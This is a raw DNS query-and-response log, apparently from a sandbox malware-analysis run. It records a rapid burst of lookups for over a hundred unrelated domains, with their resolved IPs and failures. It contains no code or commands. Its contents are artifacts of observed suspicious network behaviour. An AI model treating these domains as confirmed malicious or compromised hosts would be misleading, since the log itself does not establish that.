                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.488959074 CET8.8.8.8192.168.2.60x3ea8No error (0)geecl.com213.175.217.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.489079952 CET8.8.8.8192.168.2.60xbd79No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.739123106 CET8.8.8.8192.168.2.60xefeNo error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.747342110 CET8.8.8.8192.168.2.60xd436Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.837032080 CET8.8.8.8192.168.2.60xb92cServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.938040972 CET8.8.8.8192.168.2.60xfb16No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.997026920 CET8.8.8.8192.168.2.60x258dNo error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.999563932 CET8.8.8.8192.168.2.60x8290Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.006505013 CET8.8.8.8192.168.2.60xb1a8No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.011902094 CET8.8.8.8192.168.2.60x573cNo error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.039237022 CET8.8.8.8192.168.2.60x77eeServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.067496061 CET8.8.8.8192.168.2.60x8806Name error (3)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.110311031 CET8.8.8.8192.168.2.60x273eName error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.161550999 CET8.8.8.8192.168.2.60x665aNo error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.182498932 CET8.8.8.8192.168.2.60xe714No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.182498932 CET8.8.8.8192.168.2.60xe714No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.182498932 CET8.8.8.8192.168.2.60xe714No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.182498932 CET8.8.8.8192.168.2.60xe714No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.247780085 CET8.8.8.8192.168.2.60x8290Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.253348112 CET8.8.8.8192.168.2.60xeb1No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.326468945 CET8.8.8.8192.168.2.60x6a70No error (0)vivastay.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.326468945 CET8.8.8.8192.168.2.60x6a70No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.326468945 CET8.8.8.8192.168.2.60x6a70No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.326468945 CET8.8.8.8192.168.2.60x6a70No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.363941908 CET8.8.8.8192.168.2.60x83b5No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.411151886 CET8.8.8.8192.168.2.60xd08dNo error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.411151886 CET8.8.8.8192.168.2.60xd08dNo error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.428158045 CET8.8.8.8192.168.2.60xc1a7No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.474096060 CET8.8.8.8192.168.2.60x7631No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.474096060 CET8.8.8.8192.168.2.60x7631No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.489723921 CET8.8.8.8192.168.2.60xa12eServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.509329081 CET8.8.8.8192.168.2.60xcc4No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.541843891 CET8.8.8.8192.168.2.60x93fcNo error (0)bd-style.com107.165.223.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.551098108 CET8.8.8.8192.168.2.60x69fcServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.552706957 CET8.8.8.8192.168.2.60xf661No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.552706957 CET8.8.8.8192.168.2.60xf661No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.587500095 CET8.8.8.8192.168.2.60x8e3eNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.656862974 CET8.8.8.8192.168.2.60x3868No error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.656862974 CET8.8.8.8192.168.2.60x3868No error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.669141054 CET8.8.8.8192.168.2.60x579cName error (3)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.682168007 CET8.8.8.8192.168.2.60x6034No error (0)wvs-net.de188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.682168007 CET8.8.8.8192.168.2.60x6034No error (0)wvs-net.de188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.756062031 CET8.8.8.8192.168.2.60x9400No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.767107964 CET8.8.8.8192.168.2.60xbe03No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.769830942 CET8.8.8.8192.168.2.60xe3cbNo error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.769830942 CET8.8.8.8192.168.2.60xe3cbNo error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.791246891 CET8.8.8.8192.168.2.60x963No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.828305006 CET8.8.8.8192.168.2.60xe94bNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.835644007 CET8.8.8.8192.168.2.60x4c41Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.844337940 CET8.8.8.8192.168.2.60x7620No error (0)yhsll.com154.88.50.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.869426012 CET8.8.8.8192.168.2.60xc6eaName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.871022940 CET8.8.8.8192.168.2.60xe23dNo error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.875787973 CET8.8.8.8192.168.2.60xfc19No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.917565107 CET8.8.8.8192.168.2.60x366aNo error (0)revoldia.net45.200.235.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.012854099 CET8.8.8.8192.168.2.60xa73fName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.059237957 CET8.8.8.8192.168.2.60x7436No error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.059237957 CET8.8.8.8192.168.2.60x7436No error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.059237957 CET8.8.8.8192.168.2.60x7436No error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.061736107 CET8.8.8.8192.168.2.60x8cb7No error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.061736107 CET8.8.8.8192.168.2.60x8cb7No error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.092583895 CET8.8.8.8192.168.2.60x1cefNo error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.099822044 CET8.8.8.8192.168.2.60xf46eName error (3)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.108170033 CET8.8.8.8192.168.2.60xc189No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.168828964 CET8.8.8.8192.168.2.60x64adNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.168828964 CET8.8.8.8192.168.2.60x64adNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.168828964 CET8.8.8.8192.168.2.60x64adNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.168828964 CET8.8.8.8192.168.2.60x64adNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.179917097 CET8.8.8.8192.168.2.60x76baNo error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.206217051 CET8.8.8.8192.168.2.60x31bfNo error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.216717005 CET8.8.8.8192.168.2.60x8561No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.235346079 CET8.8.8.8192.168.2.60xba44No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.235346079 CET8.8.8.8192.168.2.60xba44No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.235346079 CET8.8.8.8192.168.2.60xba44No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.235346079 CET8.8.8.8192.168.2.60xba44No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.268230915 CET8.8.8.8192.168.2.60x1932No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.268230915 CET8.8.8.8192.168.2.60x1932No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.281708002 CET8.8.8.8192.168.2.60x9f3dNo error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.291193962 CET8.8.8.8192.168.2.60xed60No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.291193962 CET8.8.8.8192.168.2.60xed60No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.377038956 CET8.8.8.8192.168.2.60x46b5No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.413562059 CET8.8.8.8192.168.2.60xd694No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.413562059 CET8.8.8.8192.168.2.60xd694No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.499599934 CET8.8.8.8192.168.2.60xb46bNo error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.501981974 CET8.8.8.8192.168.2.60xa48dNo error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.515078068 CET8.8.8.8192.168.2.60x240No error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.523413897 CET8.8.8.8192.168.2.60xe3d5No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.576822042 CET8.8.8.8192.168.2.60x94No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.578314066 CET8.8.8.8192.168.2.60x47f9No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.676454067 CET8.8.8.8192.168.2.60x9cf3No error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.676454067 CET8.8.8.8192.168.2.60x9cf3No error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.676692009 CET8.8.8.8192.168.2.60xb68dNo error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.727076054 CET8.8.8.8192.168.2.60x55c4No error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.751223087 CET8.8.8.8192.168.2.60x9a5fNo error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.763541937 CET8.8.8.8192.168.2.60xe0d3Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.764322996 CET8.8.8.8192.168.2.60x4c94No error (0)hyab.se188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.764322996 CET8.8.8.8192.168.2.60x4c94No error (0)hyab.se188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.895612001 CET8.8.8.8192.168.2.60x130aNo error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.089301109 CET8.8.8.8192.168.2.60x7b6eNo error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.217412949 CET8.8.8.8192.168.2.60xed7dNo error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.272877932 CET8.8.8.8192.168.2.60xc378No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.346846104 CET8.8.8.8192.168.2.60xfaf8No error (0)any-s.net185.104.28.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.374154091 CET8.8.8.8192.168.2.60x671dNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.377938986 CET8.8.8.8192.168.2.60xb87cNo error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.377938986 CET8.8.8.8192.168.2.60xb87cNo error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.406905890 CET8.8.8.8192.168.2.60x1d9fNo error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.406905890 CET8.8.8.8192.168.2.60x1d9fNo error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.459186077 CET8.8.8.8192.168.2.60xf2d4No error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.494142056 CET8.8.8.8192.168.2.60xfbeaNo error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.500196934 CET8.8.8.8192.168.2.60x3e02No error (0)sinwal.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.500196934 CET8.8.8.8192.168.2.60x3e02No error (0)sinwal.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.533974886 CET8.8.8.8192.168.2.60x650dName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.545104027 CET8.8.8.8192.168.2.60xf05eNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.560616016 CET8.8.8.8192.168.2.60xfebdNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.626425028 CET8.8.8.8192.168.2.60x8335No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.626425028 CET8.8.8.8192.168.2.60x8335No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.639435053 CET8.8.8.8192.168.2.60x9a6bNo error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.641343117 CET8.8.8.8192.168.2.60x9a39Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.681468964 CET8.8.8.8192.168.2.60x5031No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.718024015 CET8.8.8.8192.168.2.60x39feNo error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.718024015 CET8.8.8.8192.168.2.60x39feNo error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.724282026 CET8.8.8.8192.168.2.60x52f8No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.792762041 CET8.8.8.8192.168.2.60xc560No error (0)sigtoa.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.792762041 CET8.8.8.8192.168.2.60xc560No error (0)sigtoa.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.798417091 CET8.8.8.8192.168.2.60xc26dNo error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.823520899 CET8.8.8.8192.168.2.60x2b5cNo error (0)sigtoa.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.823520899 CET8.8.8.8192.168.2.60x2b5cNo error (0)sigtoa.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.829211950 CET8.8.8.8192.168.2.60xfbc4Name error (3)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.838177919 CET8.8.8.8192.168.2.60xa986Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.843878984 CET8.8.8.8192.168.2.60xa986Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.864377022 CET8.8.8.8192.168.2.60x1ee5No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.869864941 CET8.8.8.8192.168.2.60x926eNo error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.878782034 CET8.8.8.8192.168.2.60x834aNo error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.878782034 CET8.8.8.8192.168.2.60x834aNo error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.884708881 CET8.8.8.8192.168.2.60x261dNo error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.898327112 CET8.8.8.8192.168.2.60xf2e0No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.906261921 CET8.8.8.8192.168.2.60xcef1No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.911324978 CET8.8.8.8192.168.2.60xb7d1No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.935695887 CET8.8.8.8192.168.2.60xbdb6No error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.937652111 CET8.8.8.8192.168.2.60xe4cfServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.977441072 CET8.8.8.8192.168.2.60xf5aeNo error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.985918999 CET8.8.8.8192.168.2.60x9d2No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.996445894 CET8.8.8.8192.168.2.60x841Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.999463081 CET8.8.8.8192.168.2.60x941eNo error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.017119884 CET8.8.8.8192.168.2.60x93aNo error (0)dyag-eng.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.058713913 CET8.8.8.8192.168.2.60x44f5No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.101226091 CET8.8.8.8192.168.2.60xa795No error (0)anduran.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.101226091 CET8.8.8.8192.168.2.60xa795No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.101226091 CET8.8.8.8192.168.2.60xa795No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.101226091 CET8.8.8.8192.168.2.60xa795No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.139228106 CET8.8.8.8192.168.2.60xab34No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.785444021 CET8.8.8.8192.168.2.60x6a78Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.818186045 CET8.8.8.8192.168.2.60x44afNo error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.818186045 CET8.8.8.8192.168.2.60x44afNo error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.818186045 CET8.8.8.8192.168.2.60x44afNo error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.818186045 CET8.8.8.8192.168.2.60x44afNo error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.927175045 CET8.8.8.8192.168.2.60xad5aNo error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.927175045 CET8.8.8.8192.168.2.60xad5aNo error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.011782885 CET8.8.8.8192.168.2.60xb5e5Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.126633883 CET8.8.8.8192.168.2.60xe4cfServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.201164961 CET8.8.8.8192.168.2.60xb270No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.201164961 CET8.8.8.8192.168.2.60xb270No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.257934093 CET8.8.8.8192.168.2.60x50c7No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
